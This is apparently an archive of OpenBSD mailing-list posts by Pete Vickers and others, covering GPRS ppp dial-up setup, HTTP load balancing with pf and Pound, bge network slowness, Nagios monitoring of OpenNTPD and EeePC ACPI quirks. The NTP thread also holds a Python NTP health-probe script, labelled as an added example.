mobile phone is connected to 'COM1' at 57600 baud, adding a system default route via the new ppp link, and automatically redialing immediately after link failure:


=/etc/ppp/peers/ISP
/dev/tty00
57600
defaultroute
debug
#kdebug 7
lock
user my_username
noauth
noccp
novj
noipdefault
persist
#demand
connect '/usr/sbin/chat -e -v -f /etc/ppp/peers/chat/ISP-gprs'
=

script to initialise modem, and dial ISP: (CFUN/CPIN... is to reset the phone, then enter the PIN code etc)

=/etc/ppp/peers/chat/ISP-gprs
REPORT "Starting chat script..."
ABORT ERROR
ABORT BUSY
ABORT 'NO CARRIER'
ABORT 'NO DIALTONE'
'' ATZ
OK AT+CFUN=1,1
OK \d\dAT+CPIN=1234
OK AT+CGDCONT=1
OK AT+CGDCONT=1,"IP","my.apn.name",,0,0
OK ATD*99***1#
CONNECT
=


your ISP username & password (see pap-secrets instead if applicable):
=/etc/ppp/peers/chap-secrets
# secrets for authentication using CHAP
# client       server  secret        IP addresses
my_username    *       my_password   *
=


create the i/f at boot time, and initiate connection:
=/etc/hostname.ppp0
up
!pppd call ISP
=


To debug:
- $ sudo ifconfig ppp0 create
- $ sudo pppd call ISP
- tail /var/log/daemon, /var/log/chat (after syslog.conf uncommenting/restart) and /etc/ppp/connection-errors




Hope this is of use.

/Pete



On 8. jun. 2006, at 08.07, Marius Van Deventer - Umzimkulu wrote:


Hi all.

By asking this question I admit that I have no idea how ppp.conf works. For a normal modem I am able to configure it fine, but for this problem I have to admit that I have no idea. I found some hits on google but nothing specific.

I managed (finally) to get gprs working on OpenBSD using my Nokia 6680.

Apart from some default route issues it works fine.

But...

I have to enter the init strings manually using minicom before i dial.

i enter:

ATZ

and then

AT+CGDCONT=1,"IP","internet"

then i exit minicom with no reset (ctrl-a q) and dial.


Obviously there HAS to be a way to include these in ppp.conf. All my
attempts have failed.

I'm sorry for the newbie-like question. Please direct answers to the
list and flames to my private address :-)

Cheers

Marius Van Deventer
Computer Technician

Bytes Technology Group : Systems Integration

Tel : +27 39 682 4202 | Fax : +27 39 682 4126 | Cell : +27 82 321 6491

Email : [EMAIL PROTECTED]




new hardware platform ?

2006-06-22 Thread Pete Vickers

Hi,

After contemplating for some time between buying a Zaurus C3100 and a HPC jazjar/universal (aka Qtek 9000, i-mate, O2 XDA Exec, T-Mobile MDA IV etc), to satisfy my requirement for mobile remote administration needs etc., I decided to go with the Jazjar, and try to live with MS windows mobile v5 (along with 3rd party SSH client etc), for the added benefit of integrated connectivity and phone etc.


An overview of the device can be found here:

http://www.gsmarena.com/qtek_9000-1264.php
http://www.qtek.nu/europe/products/9000/specifications.aspx

However, as could possibly have been predicted, Windows is driving me mad, with frequent crashes, reboots, and hanging etc.  But I really like the additional hardware features over the Zaurus, such as:


- better size for pocket
- built in wlan
- built-in bluetooth
- backlit keyboard
- built in 3G tranceiver
- built in mobile phone
- built in video-conferencing ( 2 x video cameras)

So what I'm wondering is if any developers would like to try porting OpenBSD to the Jazjar platform? I appreciate that the Zaurus port already exists for this niche, and that sufficient documentation would almost certainly be problematic/impossible to acquire for the Jazjar, but I'm hoping someone would like to try?


The biggest problem that I can see with the Jazjar is the lack of physical internal disk. (It has 64MB SDRAM, and 128MB flash ROM) but I'm hoping this could be supplemented with a 1 or 2GB card in the integrated SDIO/MMC slot. Perhaps for development, remote booting is possible via either WLAN or USB connected ethernet?


For interest, there are some additional hardware details and initial linux support for the device here:


http://wiki.xda-developers.com/index.php?pagename=UniversalResearch

http://wiki.xda-developers.com/index.php?pagename=UniversalProgress

Obviously in addition to willing developer(s), some hardware would be needed to hack on. I guess at least 2 of the devices would be needed, and they run at just under $1000 USD each (including taxes, without discounts). I'm willing to stump up a significant proportion of one device if there is enough interest - both from developers and other potential users.


Comments ? (flame proof clothing donned)

/Pete



Re: HTTP Load balancer

2006-07-06 Thread Pete Vickers

On 7. jul. 2006, at 00.11, Clint Pachl wrote:


Richard Wilson wrote:

Hulloo list,
Can anyone recommend a load balancer for http/https for OpenBSD?
Currently I'm using Pound, from http://www.apsis.ch/pound/ which runs under OpenBSD, and supports connection tracking via IP, cookie and request ID (eg PHPSESSID) and seems to do everything I need.


pf: see pf(4) pf.conf(5) pfctl(8) pfsync(4)
It can balance using round-robin, random, and source-hash. Stickiness can be applied to the round-robin and random methods. The stickiness option and source-hash method will satisfy https, and http if you are not sharing session data among servers.


Best of all, pf is built right in and simple as hell to use. All you need to do is config your existing firewall or put a pf box in front of your webservers. Hell, you could probably even run it on all of your webservers in a carp group (haven't done this, but seems feasible). Added bonus, pf inherently balances other services, not just http! Oh, another bonus, you can easily have automatic fail-over using pfsync and carp! I'm not sure you can beat the simplicity and robustness of pf.


As far as I'm concerned, pf obsoleted all load balancers for me. I used to use pen to balance http traffic. Because of pen's design, there were discrepancies in the web logs, where all connections, from the webservers POV, were coming from the pen load balancer. So there was an add on program, a hack, that was needed to later resolve web logs. It worked well, but what a mess. I would like to hear why people would not desire pf over some other load balancing option.


-pachl



pound can

1. operate (route, alter, etc) on/at L7, e.g. HTTP headers/URLs

2. do https<-->http forwarding, e.g. SSL off-loading

3. log URLs with source/dest IP etc

none of these can be done via pf (unless I'm mistaken)


/Pete



Re: need a machine for an itanium port

2007-06-11 Thread Pete Vickers

On 9 Jun 2007, at 6:22 PM, Diana Eichert wrote:


A big shout out to deanna@ for getting this up on undeadly.org.

Okay, y'all, with deanna@'s post of dlg@'s request on undeadly.org this is gathering steam.  So, keep your cards(Credit) and letters($ EUR YEN) coming, so Santa can visit Aus. a little earlier than usual this year.


diana



I've just transferred another 100eu to the Belgian account for this too.

Is anybody scanning ebay for a suitable machine yet ?


/Pete



Re: Setting up a virtual hosting machine w. SSH/SFTP accounts - pitfalls/experiences?

2007-07-09 Thread Pete Vickers
For a handy pound port see:

http://folesvaert.no/pound/


/Pete


On 9 Jul 2007, at 4:59 PM, Richard Wilson wrote:

> Stuart Henderson wrote:
>> On 2007/07/08 15:30, Chris Cappuccio wrote:
>>> Stuart Henderson [EMAIL PROTECTED] wrote:
>>>> Or use different ports and proxy them based on host headers rather
>>>> than burning IP addresses (for some RIR you are expected not to use
>>>> IP addresses for non-SSL virtual web hosting).
>>>>
>>>> I haven't checked, but hoststated should be able to do this.
>>> What software would you run on port 80 to break out the requests to the
>>> various apache instances?  Squid with accelerator mode seems like a massive
>>> beast to use for this purpose.  Any smaller apps?
>>
>> I thought you may already be able to use hoststated but I was mistaken.
>> The least intrusive way to add it there may be to provide a new action
>> that matches on the Host: header and allows the table name to be
>> overridden (obviously this is only any good with relay, not PF tables).
>>
>> Other than that, it looks like Apache mod_proxy (ProxyPass) can be
>> configured per-virtual-host so that should work.
>>
>> http://www.apsis.ch/pound/ is another option but I don't know how
>> well it works on OpenBSD. I think I've seen it run here, but I don't
>> know if it really works well.
>>
>> Varnish can probably do this too, but doesn't run here at all.
>> (It's a bit of an unusual app...)
>>
>
> I can vouch that Pound works very well on OpenBSD, and is very BSD-like
> in its style and philosophy, the developers aiming at simple, readable,
> provable code doing a specific job well.
>
> -- 
>
> Richard 'Dave' Wilson
> Systems Administrator
>
> Senokian Solutions Ltd.
> Business Innovation Centre,
> Binley Business Park, Coventry,
> United Kingdom
> CV3 2TX
> T: +44 (0)24 76 233 400
> DDI: +44 (0)24 76 233 416
> F: +44 (0)24 76 233 401
>



Pete Vickers

[EMAIL PROTECTED] |  +47 48 17 91 00

SystemNet AS



Re: Hmm...

2007-07-25 Thread Pete Vickers
Plenty on Ebay. If Josh's is not V2, then we can try & round up enough $$$ to grab one.

http://search.ebay.com/search/search.dll?_trksid=m37&satitle=WIC-1DSU-T1-V2


/Pete



On 25 Jul 2007, at 12:26 AM, Steve Fairhead wrote:

>>> To upgrade to a newer network setup, we kind of need a particular piece
> of equipment:
>
> Cisco T1 DSU/CSU WAN Interface Card (WIC-1DSU-T1-V2)
>
> http://www.cisco.com/en/US/products/hw/routers/ps221/ 
> products_data_sheet0918
> 6a00801a9184.html
>
> It has to be the V2 model.
>
> If someone can get one to me, that would be great.
> <<
>
> I'm happy to put e.g. $50 towards it, if money can get you one.
>
> Steve
> http://www.fivetrees.com



Re: scanner??

2007-09-11 Thread Pete Vickers
Just to chime in my experiences, I have an old HP scanner/copier connected via a parallel cable to a HP jetdirect box.


From my openbsd host I simply run the following to retrieve an image of the current page on the scanner glass.


wget -S -v -t 1 -O scan.pdf "http://jetdirect:9280/scan/scan.pdf?scan_id=1&image_format=3&paper_size=2&image_type=1&dpi=150&gamma=1"


I regard this as the scanning equivalent of Bob's 'get a PS printer' to avoid the complexities of drivers...



/Pete




On 11 Sep 2007, at 4:52 PM, Bob Beck wrote:


Interesting, because I'm seeking the same. Based on sane's site and
what was at the local staples, I bought a Canon Lide 25 - however the
sane support on openbsd didn't work, better yet, if I boot to windows
to see if the thing is boned or not, trying to install the windows
driver crashes (I get the demoplay.exe has crashed - do you wanna tell
microsoft?).

Needless to say I don't need the aggravation  - the canon is going
back to the store and based on the recommendations here I'll look for an
epson.

-Bob


* Vim Visual <[EMAIL PROTECTED]> [2007-09-10 04:22]:
I forgot to mention... ahem... I want to use it with OpenBSD, of course...


(just in case of)

Pau

2007/9/10, Vim Visual <[EMAIL PROTECTED]>:

Hi,

Yet almost an amateur, I have totally moved to OpenBSD, I have
preordered my CDs, I bought them in the last release, tshirt/s too and
I am a missionary of the Unique Truth and try to convert all salvages
around me to it.

Now, I am looking forward to buying a scanner. I don't want a scanner,
printer, washing machine and vacuum cleaner, I just want a scanner
that scans documents and pictures. That's it.

... and I wonder whether any of you has a recommendation for me.

Do you?

Thanks a lot,

Pau Amaro Seoane




--
#!/usr/bin/perl
if ((not 0 && not 1) !=  (! 0 && ! 1)) {
   print "Larry and Tom must smoke some really primo stuff...\n";
}




Re: Network Slowness Proliant DL380 G4

2008-02-06 Thread Pete Vickers
OpenBSD's bge driver sucks big time, typical symptoms are very slow transfers, and incrementing errors (netstat -i).

You can confirm this by booting $other_os_boot_cd and retesting.

/Pete


On 6 Feb 2008, at 6:33 PM, Mark Parsons wrote:


Greetings,

It appears that I am having some major slowness issues on a HP
Proliant DL380G4 after a fresh install of OpenBSD 4.2 i386 single
processor kernel

When running a iperf (http://dast.nlanr.net/Projects/Iperf/) test to a
Linux host on the same physical subnet on the same physical switch we
are seeing around 4Mb/sec on a Gigabit broadcom card. After changing
the net.inet.tcp.sendspace and net.inet.tcp.sendspace to 262144 and
running iperf again we see the speeds jump up to around 72Mb/sec which
still seems slow since linux hosts on the same subnet are getting
around 757Mb/sec on similar cards and hardware.  I checked and my
net.inet.ip.ifq.maxlen is set to 256

Should I be running a different test then iperf?
Any thoughts on why I am seeing such low numbers for a Gigabit card?
Any suggestions for system changes I should make?
Any help is very much appreciated.

The outputs of the iperf tests and dmesg are below.

# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d

Server listening on TCP port 5001
TCP window size: 16.0 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size: 16.0 KByte (default)

[  6] local 192.168.129.86 port 35490 connected with 156.40.133.188 port 5001
[  7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 52430

[  6]  0.0-10.0 sec  5.12 MBytes  4.29 Mbits/sec
[  7]  0.0-10.1 sec  5.54 MBytes  4.61 Mbits/sec
# sysctl -w net.inet.tcp.sendspace=262144
net.inet.tcp.sendspace: 16384 -> 262144
# sysctl -w net.inet.tcp.recvspace=262144
net.inet.tcp.recvspace: 16384 -> 262144
# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d

Server listening on TCP port 5001
TCP window size:   256 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size:   256 KByte (default)

[  6] local 192.168.129.86 port 45594 connected with 156.40.133.188 port 5001
[  7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 50890

[  6]  0.0-10.0 sec  86.0 MBytes  72.0 Mbits/sec
[  7]  0.0-10.0 sec  85.0 MBytes  71.1 Mbits/sec


Dmesg: OpenBSD 4.2 (GENERIC) #375: Tue Aug 28 10:38:44 MDT 2007
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.60GHz ("GenuineIntel" 686-class) 3.61 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,EST,TM2,CNXT-ID,CX16,xTPR

real mem  = 3757613056 (3583MB)
avail mem = 3650039808 (3480MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 12/31/99, BIOS32 rev. 0 @
0xf, SMBIOS rev. 2.3 @ 0xec000 (58 entries)
bios0: vendor HP version "P51" date 08/26/2004
bios0: HP ProLiant DL380 G4
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801EB/ER LPC" rev 0x00)

pcibios0: PCI bus #10 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
acpi at mainbus0 not configured
cpu0 at mainbus0
cpu0: Enhanced SpeedStep disabled by BIOS
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0a
ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0a
pci1 at ppb0 bus 2
ppb1 at pci1 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci2 at ppb1 bus 3
bge0 at pci2 dev 1 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0
(0x2100): irq 5, address 00:0f:20:f7:52:f1
brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
bge1 at pci2 dev 1 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0
(0x2100): irq 5, address 00:0f:20:f7:52:f0
brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
ppb2 at pci1 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci3 at ppb2 bus 4
ciss0 at pci3 dev 3 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 5

ciss0: 1 LD, HW rev 1, FW 2.26/2.26
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0:  SCSI0 0/direct fixed
sd0: 173639MB, 22135 cyl, 255 head, 63 sec, 512 bytes/sec, 355612800 sec total

ppb3 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0a
pci4 at ppb3 bus 5
ppb4 at pci4 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci5 at ppb4 bus 6
ppb5 at pci4 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci6 at ppb5 bus 10
uhci0 at pci0 dev 29 function 0 "Intel 82801EB/ER USB" rev 0x02: irq 5
uhci1 at pci0 dev 29 function

Re: zombies - solved

2008-03-12 Thread Pete Vickers

If you want to serve http content via IPv6, then perhaps you can run
httpd on your (IPv4) loopback interface, and have relayd listen on
your public IPv6 interface, and forward requests over IPv4 to it ?

/Pete


On 12 Mar 2008, at 4:22 PM, Lars Noodin wrote:


Theo de Raadt wrote:

apache2 is not free enough.


Ok. There were some additional reasons mentioned, but licensing is
enough on its own.  I found the old announcement now that I know what to
look for:
http://archives.neohapsis.com/archives/openbsd/2004-06/0448.html

Apache 1.3.29 is decent enough and has the functionality, name brand
recognition and familiarity needed.  But without updates, it seems a
dead end and not a good idea for new activities.  I'm also not finding
reference to IPv6 in the documentation for Apache 1.3.x either online or
in the man pages and that was my main reason for even looking at
Apache2.

A fork does not seem like a good return on investment, so v 1.3.29 will
probably go away sooner than later once the Apache Foundation drops
maintenance on the 1.3 series.

Gregg proposed, nginx ( http://nginx.net/ ), which seems to be just
getting started.  It's under a 'BSD-like' license.  It might work, but
seems new.

I see Lighttpd already in the 'packages' and it is under an appropriate
license.  In the last year, it has gained a lot in both visibility and
user-base.  In a lot of cases, perhaps most, new setups could be steered
towards Lighttpd, if it were mentioned in the documentation here and
there.  I probably would have chosen it over grabbing Apache2 from the
ports tree had it been mentioned.  Apache2 and Lighttpd both required
some adjustment and I would rather future-proof my activities, just in
case they have to be supported that long.

The mention of it can be small and does not need to affect how things
are currently done.  But as more use it, it will be easier later to drop
Apache when (if) the time comes.

Would something like this be appropriate at the tail end of the httpd
man page for v 1.3.29?

 Due to licensing changes, the version of Apache shipped with
 OpenBSD will stay at version 1.3.29.  Bugfixes will be provided,
 but no further updates.  Alternatively, Lighttpd is available
 via OpenBSD's packages.


Regards,
-Lars




nagios monitoring of a remote openntp service

2008-05-08 Thread Pete Vickers

Hi,

Has anybody gotten Nagios' check_ntp_* to play nicely with a remote openntp service? It appears to rely upon services not implemented in openntp?


/Pete



Re: nagios monitoring of a remote openntp service

2008-05-08 Thread Pete Vickers

Hi,

That's not the problem! - the host is correctly listening, and indeed other hosts are correctly syncing to it. It's only the nagios check_ntp_* that doesn't like it.



$ ~> grep -i listen /etc/ntpd.conf
# Addresses to listen on (ntpd does not listen by default)
listen on *

$ ~> ps -aux | grep ntp
_ntp 18182  0.0  0.0   468   612 ??  S     19Nov06    5:57.94 ntpd: ntp engine (ntpd)
root 10889  0.0  0.0   512   616 ??  Is    19Nov06    0:00.24 ntpd: [priv] (ntpd)




/Pete


On 8 May 2008, at 12:59 PM, Dave Ewart wrote:


On Thursday, 08.05.2008 at 11:53 +0200, Pete Vickers wrote:


Has anybody gotten Nagios' check_ntp_* to play nicely with a remote
openntp service? It appears to rely upon services not implemented
in openntp?


openntpd does not listen on port 123 by default: that's what Nagios
would use to monitor.

Check man ntpd.conf for the 'listen' option.

Dave.

--
Dave Ewart [EMAIL PROTECTED], jabber:[EMAIL PROTECTED], freenode:davee

All email from me is now digitally signed, http://www.sungate.co.uk/
Fingerprint: AEC5 9360 0A35 7F66 66E9 82E4 9E10 6769 CD28 DA92




Re: nagios monitoring of a remote openntp service

2008-05-08 Thread Pete Vickers

that works fine:

$ ~>/usr/local/libexec/nagios/check_ntp_time  -H ntp1
NTP OK: Offset 0.0008395434124 secs|offset=0.000840s;60.00;120.00;


but, I'm trying to verify the NTP server's health, not that my monitoring host is sync'd to it.


"Notes:
 This plugin checks the clock offset between the local host and a
 remote NTP server. It is independent of any commandline programs or
 external libraries.

 If you'd rather want to monitor an NTP server, please use
 check_ntp_peer."


but that doesn't work (for me) :

$ ~>/usr/local/libexec/nagios/check_ntp_peer -H ntp1 -t 3
CRITICAL - Socket timeout after 3 seconds



/Pete



On 8 May 2008, at 1:55 PM, Stuart Henderson wrote:


On 2008-05-08, Pete Vickers <[EMAIL PROTECTED]> wrote:

Has anybody gotten Nagios' check_ntp_* to play nicely with a remote
openntp service? It appears to rely upon services not implemented
in openntp?


this is against an OpenNTP server;

<[EMAIL PROTECTED]:12>$ /usr/local/libexec/nagios/check_ntp_time -H ntp
NTP OK: Offset -0.002711469308 secs|offset=-0.002711s;60.00;120.00;


so, it can work.
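An added example (not code from this thread, the Nagios plugins or OpenNTPD): a Python mode 3 probe that reads the server's own state out of an ordinary client reply, which is what a health check against OpenNTPD can rely on. It assumes that check_ntp_peer depends on NTP mode 6 control queries, which OpenNTPD does not answer; the warning/critical thresholds and the constructed sample reply are assumptions of this example.

```python
"""Mode 3 (client) health probe for an NTP server such as OpenNTPD.
Assumption: check_ntp_peer needs mode 6 control messages, which OpenNTPD does
not answer; an ordinary client request is, and its reply is enough to judge
the server (leap indicator, stratum, reference id) and not only our offset."""
import socket
import struct
import time

NTP_EPOCH_OFFSET = 2208988800  # seconds from 1900-01-01 to the Unix epoch
NTP_PORT = 123
# li/vn/mode, stratum, poll, precision, then 11 big-endian 32-bit words:
# root delay, root dispersion, reference id and four 64-bit timestamps.
PACKET_FMT = "!BBbb11I"

def to_ntp_timestamp(seconds):
    """Split NTP seconds (since 1900) into 32-bit integer/fraction words."""
    whole = int(seconds)
    frac = int(round((seconds - whole) * 2 ** 32))
    if frac == 2 ** 32:  # rounding carried into the next second
        whole, frac = whole + 1, 0
    return whole & 0xFFFFFFFF, frac

def from_ntp_timestamp(whole, frac):
    return whole + frac / 2 ** 32

def build_request(transmit_ts):
    """Client request: LI=0, VN=4, mode=3, only the transmit timestamp set."""
    words = [0] * 11
    words[9], words[10] = to_ntp_timestamp(transmit_ts)
    return struct.pack(PACKET_FMT, (0 << 6) | (4 << 3) | 3, 0, 0, 0, *words)

def parse_reply(data):
    """Decode a 48-byte server packet into header fields and timestamps."""
    if len(data) < 48:
        raise ValueError("short NTP packet: %d bytes" % len(data))
    first, stratum, poll, precision, *w = struct.unpack(PACKET_FMT, data[:48])
    return {
        "li": first >> 6, "version": (first >> 3) & 7, "mode": first & 7,
        "stratum": stratum, "poll": poll, "precision": precision,
        "root_delay": w[0] / 2 ** 16,  # 16.16 fixed-point seconds
        "root_dispersion": w[1] / 2 ** 16,
        "ref_id": w[2].to_bytes(4, "big"),
        "reference": from_ntp_timestamp(w[3], w[4]),
        "raw_originate": data[24:32],  # compared byte-for-byte in assess()
        "originate": from_ntp_timestamp(w[5], w[6]),
        "receive": from_ntp_timestamp(w[7], w[8]),
        "transmit": from_ntp_timestamp(w[9], w[10]),
    }

def measure(reply, t4):
    """Clock offset and round-trip delay from the four on-wire timestamps."""
    t1, t2, t3 = reply["originate"], reply["receive"], reply["transmit"]
    return ((t2 - t1) + (t3 - t4)) / 2, (t4 - t1) - (t3 - t2)

def assess(reply, request, t4, warn=0.5, crit=1.0):
    """Return a Nagios-style (exit code, message) for the server's health."""
    if reply["mode"] != 4:
        return 2, "CRITICAL - unexpected NTP mode %d" % reply["mode"]
    if reply["raw_originate"] != request[40:48]:
        # A genuine reply echoes our transmit timestamp; anything else is
        # stale or unsolicited, so its clock data must not be trusted.
        return 2, "CRITICAL - originate timestamp does not match our request"
    if reply["li"] == 3 or reply["stratum"] == 0 or reply["stratum"] >= 16:
        return 2, "CRITICAL - server unsynchronised (LI=%d, stratum=%d)" % (
            reply["li"], reply["stratum"])
    offset, delay = measure(reply, t4)
    detail = "offset %.6fs delay %.6fs stratum %d ref %r" % (
        offset, delay, reply["stratum"], reply["ref_id"])
    if abs(offset) >= crit:
        return 2, "CRITICAL - " + detail
    if abs(offset) >= warn:
        return 1, "WARNING - " + detail
    return 0, "OK - " + detail

def make_sample_reply(request, receive_ts, transmit_ts, stratum=2, li=0):
    """Constructed mode 4 reply for offline use; it echoes the request's
    transmit timestamp as the originate timestamp, as a real server does."""
    words = [0] * 11
    words[0], words[1] = int(0.005 * 2 ** 16), int(0.010 * 2 ** 16)
    words[2] = int.from_bytes(b"GPS\x00", "big")  # stratum-1 source label
    words[3], words[4] = to_ntp_timestamp(receive_ts - 64)
    words[5], words[6] = struct.unpack("!II", request[40:48])
    words[7], words[8] = to_ntp_timestamp(receive_ts)
    words[9], words[10] = to_ntp_timestamp(transmit_ts)
    first = (li << 6) | (4 << 3) | 4
    return struct.pack(PACKET_FMT, first, stratum, 6, -20, *words)

def probe(host, timeout=3.0):
    """Send one client request over UDP/123 and assess the reply."""
    family, socktype, proto, _, addr = socket.getaddrinfo(
        host, NTP_PORT, type=socket.SOCK_DGRAM)[0]
    request = build_request(time.time() + NTP_EPOCH_OFFSET)
    with socket.socket(family, socktype, proto) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, addr)
        try:
            data, _ = sock.recvfrom(512)
        except socket.timeout:
            return 2, "CRITICAL - no reply from %s in %ss" % (host, timeout)
    return assess(parse_reply(data), request, time.time() + NTP_EPOCH_OFFSET)
```

As a plugin, print the message and exit with the code that probe("ntp1") returns; the originate check rejects replies that were not sent in answer to this request.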




eeepc acpi

2008-05-08 Thread Pete Vickers

Hi Matthieu,

Just a quick note concerning the eeepc i386-laptop.html entry. I acquired one today, and installed OpenBSD via pxeboot using the builtin ethernet interface. Then I discovered it's not the entire acpi that causes panics, it's only acpibat. If you boot -c (or config -e) then:

- disable apm
- enable acpi
- disable acpibat

you'll get the following:

# sysctl hw
hw.machine=i386
hw.model=Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686-class)

hw.ncpu=1
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=wd0,sd0
hw.diskcount=2
hw.sensors.acpitz0.temp0=54.05 degC (zone temperature)
hw.sensors.acpiac0.indicator0=On (power supply)
hw.cpuspeed=631
hw.setperf=100
hw.vendor=ASUSTeK Computer INC.
hw.product=701
hw.version=x.x
hw.serialno=EeePC-1234567890
hw.uuid=80480a3a-bf04-dd81-37b7-001fc65688ff
hw.physmem=527527936
hw.usermem=527523840
#

and

# apmd
# apm -A
# apm
Battery state: absent, 0% remaining, unknown life estimate
A/C adapter state: connected
Performance adjustment mode: auto (75 MHz)


Full dmesg below:


/Pete


OpenBSD 4.3-current (GENERIC) #853: Fri May  2 04:37:23 MDT 2008
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686-class) 631 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,TM,SBF

real mem  = 527527936 (503MB)
avail mem = 501972992 (478MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 03/03/08, BIOS32 rev. 0 @ 0xf0010, SMBIOS rev. 2.5 @ 0xf06e0 (37 entries)

bios0: vendor American Megatrends Inc. version "0910" date 03/03/2008
bios0: ASUSTeK Computer INC. 701
apm at bios0 function 0x15 not configured
acpi0 at bios0: rev 0
acpi0: tables DSDT FACP APIC OEMB MCFG
acpi0: wakeup devices P0P3(S0) P0P4(S0) P0P5(S0) P0P6(S0) P0P7(S0) MC97(S0) USB1(S0) USB2(S0) USB3(S0) USB4(S0) EUSB(S0)

acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 5 (P0P3)
acpiprt2 at acpi0: bus 3 (P0P5)
acpiprt3 at acpi0: bus 1 (P0P6)
acpiec0 at acpi0
acpicpu0 at acpi0: C3, C2
acpitz0 at acpi0: critical temperature 90 degC
acpibat at acpi0 not configured
acpiac0 at acpi0: AC unit online
acpiasus0 at acpi0
acpibtn0 at acpi0: LID_
acpibtn1 at acpi0: SLPB
acpibtn2 at acpi0: PWRB
bios0: ROM list: 0xc/0xf800!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82915GM Host" rev 0x04
vga1 at pci0 dev 2 function 0 "Intel 82915GM Video" rev 0x04
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
agp0 at vga1: aperture at 0xd000, size 0x1000
"Intel 82915GM Video" rev 0x04 at pci0 dev 2 function 1 not configured
azalia0 at pci0 dev 27 function 0 "Intel 82801FB HD Audio" rev 0x04: irq 5

azalia0: codec[s]: Realtek/0x0662
audio0 at azalia0
ppb0 at pci0 dev 28 function 0 "Intel 82801FB PCIE" rev 0x04: irq 5
pci1 at ppb0 bus 4
ppb1 at pci0 dev 28 function 1 "Intel 82801FB PCIE" rev 0x04: irq 11
pci2 at ppb1 bus 3
lii0 at pci2 dev 0 function 0 "Attansic Technology L2" rev 0xa0: irq 11, address 00:1f:c6:56:88:ff
ukphy0 at lii0 phy 1: Generic IEEE 802.3u media interface, rev. 2: OUI 0x001374, model 0x0002

ppb2 at pci0 dev 28 function 2 "Intel 82801FB PCIE" rev 0x04: irq 10
pci3 at ppb2 bus 1
uhci0 at pci0 dev 29 function 0 "Intel 82801FB USB" rev 0x04: irq 3
uhci1 at pci0 dev 29 function 1 "Intel 82801FB USB" rev 0x04: irq 7
uhci2 at pci0 dev 29 function 2 "Intel 82801FB USB" rev 0x04: irq 10
uhci3 at pci0 dev 29 function 3 "Intel 82801FB USB" rev 0x04: irq 5
ehci0 at pci0 dev 29 function 7 "Intel 82801FB USB" rev 0x04: irq 3
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ppb3 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xd4
pci4 at ppb3 bus 5
ichpcib0 at pci0 dev 31 function 0 "Intel 82801FBM LPC" rev 0x04: PM disabled
pciide0 at pci0 dev 31 function 2 "Intel 82801FBM SATA" rev 0x04: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility

wd0 at pciide0 channel 1 drive 0: 
wd0: 1-sector PIO, LBA, 3815MB, 7815024 sectors
wd0(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 4
ichiic0 at pci0 dev 31 function 3 "Intel 82801FB SMBus" rev 0x04: irq 7
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 512MB DDR2 SDRAM non-parity PC2-5300CL5 SO-DIMM

usb1 at uhci0: USB revision 1.0
uhub1 at usb1 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb2 at uhci1: USB revision 1.0
uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb3 at uhci2: USB revision 1.0
uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb4 at uhci3: USB revision 1.0

Re: umsm(4) SprintPCS users -- Merlin PC720 anyone?

2007-03-27 Thread Pete Vickers
I don't know about Merlin PC720, but I recently got a Merlin XU870, and it works fine out of the box:



# cu -l /dev/cuaU0 -s 230400
Connected
ati3
Manufacturer: Novatel Wireless Incorporated
